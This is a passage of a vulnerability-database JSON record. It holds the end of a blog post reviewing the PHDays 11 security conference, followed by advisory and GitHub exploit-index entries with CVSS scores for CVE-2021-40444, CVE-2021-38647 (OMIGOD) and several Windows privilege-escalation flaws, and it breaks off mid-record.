against Positive Technologies seem very ordinary and unimportant. In fact, it even seems to benefit the company somehow.\n\n## Positive Technologies\n\nAt the end of last year, Positive Technologies became a public company with a strong focus on the domestic market and the market of friendly countries. The financial results are very impressive. The company&#x27;s marketing is better than ever, especially everything related to video production. And, of course, their products are in even greater demand, because Western vendors have left the Russian market.\n\n## PHDays 11\n\nAs for the event, it is still the most important information security conference in Russia. In fact it was the most visited PHDays. 10,000+ guests at the Moscow World Trade Center, 130,000+ viewers of online broadcasts. I was only on the second day, when it was not as crowded as the first day of the conference. The atmosphere at the event was not the same as at a regular conference. It was more like a nightclub. Subdued lights, music, a lot of screens and all sorts of lighting effects. Very unusual.\n\n## The Standoff\n\nThe main show of the conference is the CTF competition of hackers and blue teams, The Standoff. The toy city, which displays the infrastructure of the virtual state of F, has become really huge. Entire sectors of the economy were represented there: metallurgy, electric power industry, oil industry, transport, banking system, housing management. etc. All this is interconnected. An attack on one object can cause a butterfly effect that affects the entire state. Very impressive!\n\n## Talks\n\nThe PHDays 11 program included about 100 talks, which were attended by more than 250 speakers. One of them was me. It makes no sense to list all the talks, but logically I would highlight out 3 of them.\n\n 1. Sergey Golovanov &quot;[01111111day](<https://www.youtube.com/watch?v=p6-4Ky7uy_E>)**&quot;** ([rus](<https://www.youtube.com/watch?v=8e-VRSzRHVg>)). He spoke about the attacks on Russian organisations after February 23rd. To summarize all that has been said, the number of attacks has become much greater. The source of the attacks is clear. Most of the attacks were simple and it was hacktivism, but they get more complicated with time. The main attacks are DDoS and penetration into the infrastructure for further data theft and destruction. Phishing is one of the commonly used penetration channels.\n 2. Alexander Goncharov &quot;[CVE-2021-40444: why it is important](<https://www.youtube.com/watch?v=knCqmDoELjM>)&quot; ([rus](<https://www.youtube.com/watch?v=8e-VRSzRHVg>)). Microsoft MSHTML Remote Code Execution Vulnerability. This is not the newest vulnerability, one of many. But in fact, it continues to be actively exploited, and mainly through phishing. Why? Since users are susceptible to phishing, hosts are not updated and hardened (disabling ActiveX, preventing office applications from creating child processes). And all this, of course, needs to be implemented in organizations. But one of the interesting questions is: can we now trust vendor updates that fix vulnerabilities? Alexander replied that we can, because enterprise IT vendors like Microsoft will not disable anything in terms of functionality. Simply because it will be a blow to their reputation.\n 3. And my presentation was just about this topic of trust. &quot;[The new reality of information security and vulnerability management](<https://www.youtube.com/watch?v=phL8ClOLpqo>)&quot; ([rus](<https://www.youtube.com/watch?v=XbAxuikX_eE>)). You can watch the video in my YouTube channel in Russian and with simultaneous translation. Simultaneous translation is difficult to do, especially in the fast track, so I will also make an extended English version of this report for [VMconf 22](<https://vmconf.pw/>). By the way, you can also submit a video about Vulnerability Management there if you want. So what was my report about. The new reality of information security (TNRoIS) began in February 2022. In this new reality, global vendors and open source software are less trusted than before. What was only recently viewed as a competitive product or service, has become a means of pressure, a Trojan horse, a threat to corporate information security. The new reality sets new requirements for key corporate processes, including the choice of IT products and information security solutions, security analysis, and update management. The forced de-Westernization of the IT infrastructure of Russian companies will not happen overnight. This is a long and difficult process. For example, is it true that by 2025 there will be no Microsoft software in Russian companies and everything will work on Russian Linux distributions? Now it seems too ambitious. Most likely we will see some kind of hybrid mode with a complex process of supporting unstable Western IT solutions and a simplified process for stable, mainly Russian IT solutions. Of course, it will be much more difficult than it was before, but there is a challenge in these difficulties. The problems faced by the Russian organizations in extreme form are relevant to much of the world, which means that certain terminology, approaches, and solutions can be successfully exported. \n\n## What could be better on PHDays 11?\n\nWell, there were few speeches about Vulnerability Management. For my taste. There was my presentation, there were a couple of speeches about specific vulnerabilities and rootkits, there was a [basic interview about Vulnerability Management](<https://www.youtube.com/watch?v=Scod5yQiKtM>) ([rus](<https://www.youtube.com/watch?v=Cgbq1qG_CZQ>)) and an interview about [MaxPatrol O2](<https://www.youtube.com/watch?v=hCSK0wi-KRU>) ([rus](<https://www.youtube.com/watch?v=SAt_gedhXw8>)). But it was very fragmented. It seems to me that the main conference of the leading Russian Vulnerability Management vendor should have a session or maybe even a track about Vulnerability Management. At least 2-3 hours. It would be nice to have a program that would resemble [Qualys QSC](<https://avleonov.com/2021/12/06/qsc21-vmdr-training-and-exam/>). After all, they talk about VM all day, why is it not possible on PHDays? Ideally, if there would be 80% about interesting practical cases and processes and 20% about how to solve them using Positive Technologies products (as a demonstration). That would be really cool and that would be right.\n\nIt may sound silly, but I missed bag chairs and sofas. There were far fewer of them. In past years, I liked to sit on them, relax and talk with colleagues. This time all the conversations were on the feet and it was not very convenient.\n\nIt seems like PHDays needs more space. There were practically no seats left in the halls. The fast track where I performed was in a tiny hall, which is not so easy to find. The organizers said that it did not happen on purpose. The schedule was changed at the last moment and the Fast Track had to be moved from a more convenient place. It&#x27;s a bit sad, but the fact that full-length reports are a priority is right. And in our post-COVID time, the most important thing is video broadcasting, and it was at a very high level. My presentation went well, the audience was friendly, there were some very interesting questions.\n\nMany thanks to the organizers and participants. Until the next PHDays!", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-11T00:46:58", "type": "avleonov", "title": "PHDays 11: towards the Independence Era", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-06-11T00:46:58", "id": "AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "href": "https://avleonov.com/2022/06/11/phdays-11-towards-the-independence-era/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:55", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2021-38639)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38639"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0592", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:33:03", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2021-36975)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0550", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:54", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Common Log File System Driver Elevation of Privilege (CVE-2021-36963)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36963"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0545", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:33:07", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-19T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Common Log File System Driver Elevation of Privilege (CVE-2021-36955)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955"], "modified": "2021-09-19T00:00:00", "id": "CPAI-2021-0686", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:59", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Common Log File System Driver Elevation of Privilege (CVE-2021-38633)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38633"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0544", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:33:00", "description": "A remote code execution vulnerability exists in Microsoft Open Management Infrastructure. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Open Management Infrastructure Remote Code Execution (CVE-2021-38647)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-21T00:00:00", "id": "CPAI-2021-0684", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:55", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer MSHTML. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer MSHTML Remote Code Execution (CVE-2021-40444)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0554", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T15:33:57", "description": "Windows win32k ascension UAC ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-17T02:09:37", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38639"], "modified": "2021-09-17T02:38:42", "id": "745C9387-7E9D-5BA8-BC2D-5B3EF7DCE82A", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:11:02", "description": "# CVE-2021-38647: Omigod\nAnother exploit for Omigod written quic...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-26T18:06:00", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-29T10:57:34", "id": "A99AB73C-8E46-5B9C-A402-F78F96EE2327", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:11:26", "description": "# OMIGOD PoC\n\n## Usage\n\n```\n$ go run CVE-2021-38647.go -h\n\nUSAGE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T01:05:22", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-22T22:40:10", "id": "CE2FB7D7-ABCF-58F8-AACC-D0E6FEE8865A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T06:18:53", "description": "# OMIGOD\nProof on Concept Exploit for CVE-2021-38647 (OMIGOD)\n\nF...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T02:11:36", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-08-17T05:00:10", "id": "BF40B403-9D06-5460-8B40-3FC2E56A4A07", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:40", "description": "# OMIGOD_cve-2021-38647\nCVE-2021-38647 is an unauthentica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T10:53:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-10T08:48:26", "id": "54D698B4-9CF0-5D7F-88D2-1053A11EA7C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:57", "description": "# omigood (OM I GOOD?)\n\nThis repository contains a free scanner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T15:34:03", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-07-13T20:33:30", "id": "A6B7D4D8-4578-5AD8-961D-3BC35007FF29", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:56", "description": "# cve-2021-38647\nA PoC exploit for CVE-2021-38647 RCE in OMI.\n\nE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T08:33:02", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-29T12:13:38", "id": "8B4EDA16-9E27-500D-B648-9C3AD4295562", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-10T07:14:55", "description": "# Details\n## OMIGod - CVE-2021-38647\nOpen Management Infrastruct...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-19T15:43:32", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-08-10T05:21:40", "id": "64DFB465-6754-5E4B-B311-7668EDD4D962", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T23:40:22", "description": "# CVE-2021-38647\n\nCVE-2021-38647 - POC to exploit unauthenticate...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 